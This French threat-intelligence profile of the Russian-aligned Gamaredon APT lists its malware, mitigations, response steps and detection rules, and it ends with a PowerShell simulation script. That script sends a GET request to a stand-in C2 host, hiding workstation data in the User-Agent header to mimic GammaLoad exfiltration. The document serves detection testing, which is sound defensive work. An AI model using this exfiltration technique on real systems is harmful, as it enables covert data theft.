Profil APT Gamaredon (Primitive Bear) avec cartographie MITRE ATT&CK
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Gamaredon est un groupe de menace persistante avancée aligné sur la Russie actif depuis 2013 et attribué au FSB russe. Le groupe se concentre sur la cyber-espionnage et le vol de données, ciblant principalement les organisations gouvernementales et de défense ukrainiennes. Ses opérations reposent sur des familles de logiciels malveillants personnalisés telles que GammaLoad et GammaSteel, soutenues par une gamme de méthodes d’obfuscation et de persistance.
Enquête
Le rapport examine des campagnes s’étendant de 2013 à 2025 et met en évidence le passage du groupe à l’utilisation de Cloudflare Workers, des API Telegram et l’exploitation des vulnérabilités de WinRAR. Il suit également la progression de Gamaredon des droppeurs VBScript personnalisés vers des outils de vol d’informations plus avancés basés sur PowerShell et des logiciels espions pour mobiles.
Atténuation
Les atténuations recommandées incluent le patch de WinRAR pour répondre à CVE-2025-8088 et la surveillance des exécutions PowerShell suspectes. Les organisations devraient également appliquer des contrôles stricts sur les médias amovibles, observer les tâches planifiées inhabituelles et valider les contrôles défensifs contre les TTP connus de Gamaredon grâce à des plateformes de simulation et de test.
Réponse
Si une activité de Gamaredon est détectée, les intervenants doivent isoler immédiatement les hôtes affectés, en particulier les systèmes montrant des signes de GammaSteel ou d'activité de logiciels malveillants Ptero* . Les enquêteurs devraient examiner la persistance basée sur le registre, inspecter les tâches planifiées pour des entrées non autorisées et mener une recherche large pour un trafic sortant suspect vers une infrastructure liée à Cloudflare ou Telegram.
Flux de l’Attaque
Détections
Appel de méthodes .NET suspectes depuis Powershell (via powershell)
Voir
Points de persistance possibles [ASEPs – Logiciel/Bloc de registre NTUSER] (via évènement_registre)
Voir
Exfiltration possible de données via l’outil Rclone (via ligne de commande)
Voir
Télécharger ou téléverser via Powershell (via ligne de commande)
Voir
Appel de classes/méthodes .NET suspectes depuis la ligne de commande Powershell (via création_processus)
Voir
Schtasks pointe vers un répertoire / binaire / script suspect (via ligne de commande)
Voir
WScript / CScript LOLBAS (via création_processus)
Voir
Comportement d’évasion de défense MSHTA LOLBAS suspect par détection de commandes associées (via création_processus)
Voir
Binaires / scripts suspects dans l’emplacement de démarrage automatique (via évènement_fichier)
Voir
Tentative possible d’exploitation de la vulnérabilité CVE-2025-8088 / CVE-2025-6218 (WinRAR) (via évènement_fichier)
Voir
Service DNS dynamique possible contacté (via DNS)
Voir
Détection des requêtes GET de Gamaredon GammaLoad avec exfiltration User-Agent [Connexion réseau Windows]
Voir
Téléchargeur PowerShell via raccourci LNK avec obfuscation [Windows Powershell]
Voir
## Exécution de la simulation
Prérequis : Le contrôle préliminaire de télémétrie et de base de référence doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique adverse (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Narratif et commandes de l’attaque : Un adversaire a établi un point d’ancrage sur
WORKSTATION01. Pour exfiltrer les métadonnées du système (telles que les noms d’hôtes ou les noms d’utilisateur) sans déclencher les dispositifs traditionnels de protection contre les fuites de données basées sur les fichiers, il utilise une implémentation personnalisée du malware GammaLoad. Ce malware effectue des requêtes HTTP GET vers un serveur de Commande & Contrôle (C2) distant. Au lieu de placer les données dans l’URI ou le corps du POST, le malware intègre l’identité du poste de travail codée dans l’en-têteUser-Agent:::WORKSTATION01_encoded_data. Cela permet aux données de contourner le filtrage simple des URL tout en restant cachées dans le trafic web standard. -
Script de test de régression : Ce script utilise PowerShell pour simuler la requête HTTP GET spécifique avec la chaîne User-Agent malveillante nécessaire pour déclencher la règle.
# Simulation de l'exfiltration User-Agent de GammaLoad $TargetUrl = "http://example-c2-server.com/api/check" $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST" Write-Host "[*] Démarrage de la simulation : Envoi de la requête GET avec User-Agent malveillant..." -ForegroundColor Cyan try { $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET Write-Host "[+] Requête envoyée avec succès. Vérifiez le SIEM pour alerte." -ForegroundColor Green } catch { # Nous attendons une erreur de connexion si l'URL n'existe pas, # mais le User-Agent sera toujours enregistré par le proxy. Write-Host "[!] Requête tentée (Remarque : Erreur de connexion attendue si l'URL est invalide, mais les journaux du proxy devraient toujours capturer le UA)." -ForegroundColor Yellow } -
Commandes de nettoyage : Étant donné que cette simulation ne génère que du trafic réseau transitoire et ne modifie pas les fichiers système ou les clés de registre, aucun nettoyage n’est requis.
# Aucun changement système n'a été effectué. Simulation terminée. Write-Host "[*] Nettoyage : Aucune trace laissée sur l'hôte." -ForegroundColor Green